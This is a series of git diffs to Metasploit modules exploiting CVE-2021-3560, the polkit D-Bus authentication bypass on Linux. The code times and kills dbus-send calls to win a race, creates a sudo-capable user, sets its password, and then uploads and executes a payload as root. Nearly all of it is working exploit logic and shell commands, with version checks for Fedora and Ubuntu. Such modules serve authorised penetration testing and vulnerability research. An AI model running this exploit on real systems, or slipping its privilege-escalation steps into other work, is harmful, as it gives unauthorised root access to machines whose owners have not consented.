@@ -124,27 +124,106 @@ class MetasploitModule < Msf::Exploit::Local
     @cmd_delay = get_cmd_delay
 
     # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
-    # do that, the distro specific package manager would need to be queried.
-    status = CheckCode::Detected("Detected polkit framework version #{Regexp.last_match(1)}.")
+    # do that, the distro specific package manager would need to be queried. See #check_via_version.
+    polkit_version = Rex::Version.new(Regexp.last_match(1))
 
-    if !is_root? && command_exists?('dbus-send')
-      # This is required to make the /org/freedesktop/Accounts/User0 object_path available.
-      dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')
-      # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a
-      # random string before restoring it.
-      result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')
-      if result =~ /variant\s+string\s+"(.*)"/
-        old_realname = Regexp.last_match(1)
-        if exploit_set_realname(rand_text_alphanumeric(12))
-          status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
-          unless exploit_set_realname(old_realname)
-            print_error('Failed to restore the root user\'s original \'RealName\' property value')
-          end
+    status = nil
+    status ||= check_via_attempt
+    status ||= check_via_version
+    status ||= CheckCode::Detected("Detected polkit framework version #{polkit_version}.")
+
+    status
+  end
+
+  def check_via_attempt
+    status = nil
+    return status unless !is_root? && command_exists?('dbus-send')
+
+    # This is required to make the /org/freedesktop/Accounts/User0 object_path available.
+    dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')
+    # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a
+    # random string before restoring it.
+    result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')
+    if result =~ /variant\s+string\s+"(.*)"/
+      old_realname = Regexp.last_match(1)
+      if exploit_set_realname(rand_text_alphanumeric(12))
+        status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
+        unless exploit_set_realname(old_realname)
+          print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
         end
       end
     end
 
     status
+  end
+
+  def check_via_version
+    sysinfo = get_sysinfo
+    case sysinfo[:distro]
+    when 'fedora'
+      if sysinfo[:version] =~ /Fedora( release)? (\d+)/
+        distro_version = Regexp.last_match(2).to_i
+        if distro_version < 20
+          return CheckCode::Safe("Fedora version #{distro_version} is not affected (too old).")
+        elsif distro_version < 33
+          return CheckCode::Appears("Fedora version #{distro_version} is affected.")
+        elsif distro_version == 33
+          # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-3f8d6016c9
+          patched_version_string = '0.117-2.fc33.1'
+        elsif distro_version == 34
+          # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-0ec5a8a74b
+          patched_version_string = '0.117-3.fc34.1'
+        elsif distro_version > 34
+          return CheckCode::Safe("Fedora version #{distro_version} is not affected.")
+        end
+
+        result = cmd_exec('dnf list installed "polkit.*"')
+        if result =~ /polkit\.\S+\s+(\d\S+)\s+/
+          current_version_string = Regexp.last_match(1)
+          if Rex::Version.new(current_version_string) < Rex::Version.new(patched_version_string)
+            return CheckCode::Appears("Version #{current_version_string} is affected.")
+          else
+            return CheckCode::Safe("Version #{current_version_string} is not affected.")
+          end
+        end
+      end
+    when 'ubuntu'
+      result = cmd_exec('apt-cache policy policykit-1')
+      if result =~ /\s+Installed: (\S+)$/
+        current_version_string = Regexp.last_match(1)
+        current_version = Rex::Version.new(current_version_string.gsub(/ubuntu/, '.'))
+
+        if current_version < Rex::Version.new('0.105-26')
+          # The vulnerability was introduced in 0.105-26
+          return CheckCode::Safe("Version #{current_version_string} is not affected (too old, the vulnerability was introduce in 0.105-26).")
+        end
+
+        # See: https://ubuntu.com/security/notices/USN-4980-1
+        # The 'ubuntu' part of the string must be removed for Rex::Version compatibility, treat it as a point place.
+        case sysinfo[:version]
+        when /21\.04/
+          patched_version_string = '0.105-30ubuntu0.1'
+        when /20\.10/
+          patched_version_string = '0.105-29ubuntu0.1'
+        when /20\.04/
+          patched_version_string = '0.105-26ubuntu1.1'
+        when /19\.10/
+          return CheckCode::Appears('Ubuntu 19.10 is affected.')
+        end
+        # Ubuntu 19.04 and older are *not* affected
+
+        if current_version < Rex::Version.new(patched_version_string.gsub(/ubuntu/, '.'))
+          return CheckCode::Appears("Version #{current_version_string} is affected.")
+        end
+
+        return CheckCode::Safe("Version #{current_version_string} is not affected.")
+      end
+    end
+  end
+
+  def cmd_exec(*args)
+    result = super
+    result.gsub(/(\e\(B)?\e\[([;\d]+)?m/, '') # remove ANSI escape sequences from the command output
   end
 
   def dbus_method_call(object_path, interface_member, *args)
@@ -220,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit_set_password(uid, hashed_password, loop_sequence)
     cmd_exec(<<~SCRIPT
       for i in #{loop_sequence}; do
-        dbus-send#{' '}
+        dbus-send
           --system
           --dest=org.freedesktop.Accounts
           --type=method_call

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name' => 'Polkit Authentication Bypass',
+        'Name' => 'Polkit D-Bus Authentication Bypass',
         'Description' => %q{
           A vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged
           attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
+      OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]),
       OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
     register_advanced_options([
@@ -67,8 +68,12 @@ class MetasploitModule < Msf::Exploit::Local
     ])
   end
 
+  def get_loop_sequence
+    datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+  end
+
   def exploit_set_realname(new_realname)
-    loop_sequence = datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+    loop_sequence = get_loop_sequence
     cmd_exec(<<~SCRIPT
       for i in #{loop_sequence}; do
         dbus-send
@@ -106,14 +111,21 @@ class MetasploitModule < Msf::Exploit::Local
   def get_cmd_delay
     user = rand_text_alphanumeric(8)
     time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"
-    time = cmd_exec(time_command).match(/real\s+\d+m(\d+.\d+)s/)[1].to_f / 2
-    fail_with(Failure::BadConfig, "Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}") unless time
-    time
+    time = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\s+\d+m(\d+.\d+)s/)
+    unless time && time[1]
+      print_error("Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}")
+      return nil
+    end
+    time = time[1].to_f / 2
   end
 
   def check
     unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
       return CheckCode::Safe('The polkit framework is not installed.')
+    end
+
+    unless cmd_exec('which dbus-send') =~ /dbus-send/
+      return CheckCode::Safe('The dbus-send command is not accessible.')
     end
 
     # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
@@ -124,7 +136,9 @@ class MetasploitModule < Msf::Exploit::Local
     polkit_version = Rex::Version.new(Regexp.last_match(1))
 
     status = nil
+    print_status('Checking for exploitability via attempt')
     status ||= check_via_attempt
+    print_status('Checking for exploitability via version') unless status
     status ||= check_via_version
     status ||= CheckCode::Detected("Detected polkit framework version #{polkit_version}.")
 
@@ -191,7 +205,7 @@ class MetasploitModule < Msf::Exploit::Local
 
         if current_version < Rex::Version.new('0.105-26')
           # The vulnerability was introduced in 0.105-26
-          return CheckCode::Safe("Version #{current_version_string} is not affected (too old, the vulnerability was introduce in 0.105-26).")
+          return CheckCode::Safe("Version #{current_version_string} is not affected (too old, the vulnerability was introduced in 0.105-26).")
         end
 
         # See: https://ubuntu.com/security/notices/USN-4980-1
@@ -346,22 +360,23 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     fail_with(Failure::NotFound, 'Failed to access /bin/su which this exploit depends on.') unless executable?('/bin/su')
     print_status("Attempting to create user #{datastore['USERNAME']}")
-    loop_sequence = datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+    loop_sequence = get_loop_sequence
 
     if exploit_set_username(loop_sequence)
       uid = cmd_exec("id -u #{datastore['USERNAME']}")
       print_good("User #{datastore['USERNAME']} created with UID #{uid}")
       print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
       if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
-        print_good('Obtained code execution has root!')
+        print_good('Obtained code execution as root!')
         fname = upload_payload
         execute_payload(fname)
       else
         print_error("Attempted setting the password #{datastore['Iterations']} times, did not work.")
       end
     else
-      print_error("The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+      print_error("Attempted setting the password #{datastore['Iterations']} times, did not work.")
     end
+
 
     print_status('Attempting to remove the user added: ')
     if exploit_delete_user(uid, loop_sequence)

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
       OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
     register_advanced_options([
-      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp/'])
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
     ])
   end
 
@@ -99,14 +99,14 @@ class MetasploitModule < Msf::Exploit::Local
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
-  def is_executable?(path)
+  def executable?(path)
     cmd_exec("test -x '#{path}' && echo true").include? 'true'
   end
 
   def get_cmd_delay
     user = rand_text_alphanumeric(8)
     time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"
-    time = cmd_exec(time_command).match(/real\s+\d+m(\d+.\d+)s/)[1].to_f/2
+    time = cmd_exec(time_command).match(/real\s+\d+m(\d+.\d+)s/)[1].to_f / 2
     fail_with(Failure::BadConfig, "Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}") unless time
     time
   end
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The polkit framework is not installed.')
     end
 
-    unless is_executable?('/bin/su')
+    unless executable?('/bin/su')
       return CheckCode::Safe('This module requires /bin/su which does not seem to be present')
     end
 
@@ -271,31 +271,6 @@ class MetasploitModule < Msf::Exploit::Local
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
-  def exploit_delete_user(uid, loop_sequence)
-    cmd_exec(<<~SCRIPT
-      for i in #{loop_sequence}; do
-        dbus-send
-          --system
-          --dest=org.freedesktop.Accounts
-          --type=method_call
-          --print-reply
-          /org/freedesktop/Accounts
-          org.freedesktop.Accounts.DeleteUser
-          int64:#{uid}
-          boolean:true &
-        sleep #{@cmd_delay}s;
-        kill $!;
-        if id #{datastore['USERNAME']}; then
-          echo \"failed\";
-        else
-          echo \"success\";
-          break;
-        fi;
-      done
-             SCRIPT
-               .gsub(/\s+/, ' ')) =~ /success/
-  end
-
   def exploit_set_password(uid, hashed_password, loop_sequence)
     cmd_exec(<<~SCRIPT
       for i in #{loop_sequence}; do
@@ -323,6 +298,31 @@ class MetasploitModule < Msf::Exploit::Local
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
+  def exploit_delete_user(uid, loop_sequence)
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.DeleteUser
+          int64:#{uid}
+          boolean:true &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then
+          echo \"failed\";
+        else
+          echo \"success\";
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
   def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
     rm_f path
@@ -336,7 +336,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload_payload
-    fname = "#{datastore['WRITEABLEDIR']}/#{Rex::Text.rand_text_alpha(5)}"
+    fname = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}"
     upload_and_chmodx(fname, generate_payload_exe)
     return nil unless file_exist?(fname)
 

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -130,6 +130,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
     @cmd_delay = get_cmd_delay
+    return CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?
 
     # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
     # do that, the distro specific package manager would need to be queried. See #check_via_version.

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -359,10 +359,10 @@ class MetasploitModule < Msf::Exploit::Local
         fname = upload_payload
         execute_payload(fname)
       else
-        fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
+        print_error("Attempted setting the password #{datastore['Iterations']} times, did not work.")
       end
     else
-      fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+      print_error("The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
     end
 
     print_status('Attempting to remove the user added: ')

--- a/modules/exploits/linux/local/polkit_priv_esc.rb
+++ b/modules/exploits/linux/local/polkit_priv_esc.rb
@@ -1,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'unix_crypt'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Local::Linux
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Polkit Authentication Bypass',
+        'Description' => %q{
+          A vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged
+          attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a
+          method over D-Bus and kills the client process. This will occasionally cause the operation to complete without
+          being subjected to all of the necessary authentication.
+          The exploit module leverages this to add a new user with a sudo access and a known password. The new account
+          is then leveraged to execute a payload with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kevin Backhouse',                   # vulnerability discovery and analysis
+            'Spencer McIntyre',                  # metasploit module
+            'jheysel-r7'                         # metasploit module
+          ],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => ['unix', 'linux'],
+        'References' => [
+          ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
+          ['CVE', '2021-3560'],
+        ],
+        'Targets' =>
+          [
+            [ 'Automatic', {} ],
+          ],
+        'DefaultTarget' => 0,
+        # 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 },
+        'DisclosureDate' => '2021-06-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options([
+                       #OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]),
+                       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
+                       OptString.new('PASSWORD', [ false, 'A password to add for NewUser (default: random)' ]),
+                       OptString.new('CMDDELAY', [ true, 'Amount of time in seconds to let the command to run before killing it.
+This value should be half of the time it takes to run:
+\"time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply
+/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<USERNAME> string:"<USERNAME>" int32:1\"', '0.002' ]),
+                       OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', '20']),
+                     ])
+  end
+
+  def exploit_set_realname(new_realname)
+    cmd_exec(<<~SCRIPT
+      for i in {1..20}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts/User0
+          org.freedesktop.Accounts.User.SetRealName
+          string:'#{new_realname}' &
+        sleep 0.004s;
+        kill $!;
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --print-reply
+          /org/freedesktop/Accounts/User0
+          org.freedesktop.DBus.Properties.Get
+          string:org.freedesktop.Accounts.User
+          string:RealName
+        | grep "string \\"#{new_realname}\\"";
+        if [ $? -eq 0 ]; then
+          echo success;
+          break;
+        fi;
+      done
+             SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def check
+    unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
+      return CheckCode::Safe('The polkit framework is not installed')
+    end
+
+    # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
+    # do that, the distro specific package manager would need to be queried.
+    status = CheckCode::Detected("Detected polkit framework version #{Regexp.last_match(1)}.")
+
+    if !is_root? && command_exists?('dbus-send')
+      # This is required to make the /org/freedesktop/Accounts/User0 object_path available.
+      dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')
+      # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a
+      # random string before restoring it.
+      result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')
+      if result =~ /variant\s+string\s+"(.*)"/
+        old_realname = Regexp.last_match(1)
+        if exploit_set_realname(rand_text_alphanumeric(12))
+          status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
+          unless exploit_set_realname(old_realname)
+            print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
+          end
+        end
+      end
+    end
+
+    status
+  end
+
+  def dbus_method_call(object_path, interface_member, *args)
+    cmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply]
+    cmd_args << object_path
+    cmd_args << interface_member
+    args.each do |arg|
+      if arg.is_a? Integer
+        cmd_args << "int32:#{arg}"
+      elsif arg.is_a? String
+        cmd_args << "string:'#{arg}'"
+      end
+    end
+
+    cmd = cmd_args.join(' ')
+    vprint_status("Running: #{cmd}")
+    cmd_exec(cmd)
+  end
+
+
+  def create_unix_crypt_hash
+    UnixCrypt::SHA256.build("#{datastore['PASSWORD']}", "GoldenEye")
+  end
+
+  def create_user
+    datastore['ITERATIONS'].to_i.times do |i|
+      print_status("Command execution attempt #{i}...")
+      # TODO  - make CmdDelay configurable or calculate what it should be based on the output of the round trip for the command
+      # TODO - Randmize user name Faker::
+      print_status("Trying the command:")
+      print_status("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{datastore['USERNAME']} string:\"#{datastore['USERNAME']}\" int32:1 & sleep #{datastore['CMDDELAY']}s; kill $!; if id #{datastore['USERNAME']}; then echo \"success\"; else echo \"failed\"; fi")
+
+      output = cmd_exec("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{datastore['USERNAME']} string:\"#{datastore['USERNAME']}\" int32:1 & sleep #{datastore['CMDDELAY']}s; kill $!; if id #{datastore['USERNAME']}; then echo \"success\"; else echo \"failed\"; fi")
+      vprint_status("Output of command: #{output}")
+      if output[/success/]
+        uid = output.match(/uid=(\d+)/)[1]
+        print_good("User #{datastore['USERNAME']} created with UID #{uid}")
+        return uid
+      end
+    end
+    fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+  end
+
+  def set_password(uid, hashed_password)
+    datastore['ITERATIONS'].to_i.times do |i|
+      vprint_line("Command execution attempt #{i}...")
+      set_password_attempt = cmd_exec("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User#{uid} org.freedesktop.Accounts.User.SetPassword string:'#{hashed_password}' string:GoldenEye & sleep #{datastore['CMDDELAY']}s ; kill $! & echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S id\"")
+      if set_password_attempt[/uid=0\(root\)/]
+        print_status("#{set_password_attempt}")
+        print_good("Obtained code execution has root!")
+        return
+      end
+    end
+    fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_payload
+    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    upload_and_chmodx(fname, generate_payload_exe)
+    return nil unless file_exist?(fname)
+    fname
+  end
+
+  def execute_payload(fname)
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+  end
+
+  #TODO - use dbus to delete user method
+  def remove_user
+    print_status("Removing the user added: ")
+  end
+
+  def exploit
+    print_status("Attempting to create user #{datastore['USERNAME']}")
+    uid = create_user
+    print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+    set_password(uid, create_unix_crypt_hash)
+    fname = upload_payload
+    execute_payload(fname)
+    remove_user
+  end
+end

--- a/modules/exploits/linux/local/polkit_priv_esc.rb
+++ b/modules/exploits/linux/local/polkit_priv_esc.rb
@@ -42,36 +42,38 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
           ['CVE', '2021-3560'],
+          ['EDB', '50011'],
         ],
         'Targets' =>
           [
             [ 'Automatic', {} ],
           ],
         'DefaultTarget' => 0,
-        # 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 },
         'DisclosureDate' => '2021-06-03',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )
     register_options([
-                       #OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]),
-                       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
-                       OptString.new('PASSWORD', [ false, 'A password to add for NewUser (default: random)' ]),
-                       OptString.new('CMDDELAY', [ true, 'Amount of time in seconds to let the command to run before killing it.
+      OptString.new('WRITEABLEDIR', [ true, 'A directory where you can write files.', '/tmp' ]),
+      OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
+      OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
+      OptString.new('CMD_DELAY', [
+        true, 'Amount of time in seconds to let the command to run before killing it.
 This value should be half of the time it takes to run:
 \"time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply
-/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<USERNAME> string:"<USERNAME>" int32:1\"', '0.002' ]),
-                       OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', '20']),
-                     ])
+/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<USERNAME> string:"<USERNAME>" int32:1\"', '0.002'
+      ]),
+      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', '20']),
+    ])
   end
 
   def exploit_set_realname(new_realname)
     cmd_exec(<<~SCRIPT
-      for i in {1..20}; do
+      for i in {1..#{datastore['ITERATIONS']}}; do
         dbus-send
           --system
           --dest=org.freedesktop.Accounts
@@ -96,7 +98,7 @@ This value should be half of the time it takes to run:
           break;
         fi;
       done
-             SCRIPT
+    SCRIPT
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
@@ -146,41 +148,59 @@ This value should be half of the time it takes to run:
     cmd_exec(cmd)
   end
 
-
   def create_unix_crypt_hash
-    UnixCrypt::SHA256.build("#{datastore['PASSWORD']}", "GoldenEye")
+    UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)
   end
 
-  def create_user
-    datastore['ITERATIONS'].to_i.times do |i|
-      print_status("Command execution attempt #{i}...")
-      # TODO  - make CmdDelay configurable or calculate what it should be based on the output of the round trip for the command
-      # TODO - Randmize user name Faker::
-      print_status("Trying the command:")
-      print_status("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{datastore['USERNAME']} string:\"#{datastore['USERNAME']}\" int32:1 & sleep #{datastore['CMDDELAY']}s; kill $!; if id #{datastore['USERNAME']}; then echo \"success\"; else echo \"failed\"; fi")
-
-      output = cmd_exec("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{datastore['USERNAME']} string:\"#{datastore['USERNAME']}\" int32:1 & sleep #{datastore['CMDDELAY']}s; kill $!; if id #{datastore['USERNAME']}; then echo \"success\"; else echo \"failed\"; fi")
-      vprint_status("Output of command: #{output}")
-      if output[/success/]
-        uid = output.match(/uid=(\d+)/)[1]
-        print_good("User #{datastore['USERNAME']} created with UID #{uid}")
-        return uid
-      end
-    end
-    fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+  def exploit_set_username
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.CreateUser
+          string:#{datastore['USERNAME']}#{' '}
+          string:\"#{datastore['USERNAME']}\"#{' '}
+          int32:1 &
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then#{' '}
+          echo \"success\";#{' '}
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
   end
 
-  def set_password(uid, hashed_password)
-    datastore['ITERATIONS'].to_i.times do |i|
-      vprint_line("Command execution attempt #{i}...")
-      set_password_attempt = cmd_exec("dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User#{uid} org.freedesktop.Accounts.User.SetPassword string:'#{hashed_password}' string:GoldenEye & sleep #{datastore['CMDDELAY']}s ; kill $! & echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S id\"")
-      if set_password_attempt[/uid=0\(root\)/]
-        print_status("#{set_password_attempt}")
-        print_good("Obtained code execution has root!")
-        return
-      end
-    end
-    fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
+  def exploit_set_password(uid, hashed_password)
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}; do
+        dbus-send#{' '}
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply#{' '}
+          /org/freedesktop/Accounts/User#{uid}#{'  '}
+          org.freedesktop.Accounts.User.SetPassword#{' '}
+          string:'#{hashed_password}'#{' '}
+          string: &#{' '}
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;#{' '}
+        echo #{datastore['PASSWORD']}#{' '}
+        | su - #{datastore['USERNAME']}#{' '}
+        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"#{' '}
+        | grep \"uid=0(root)\";#{' '}
+        if [ $? -eq 0 ]; then#{' '}
+          echo \"success\";
+          break;#{' '}
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
   end
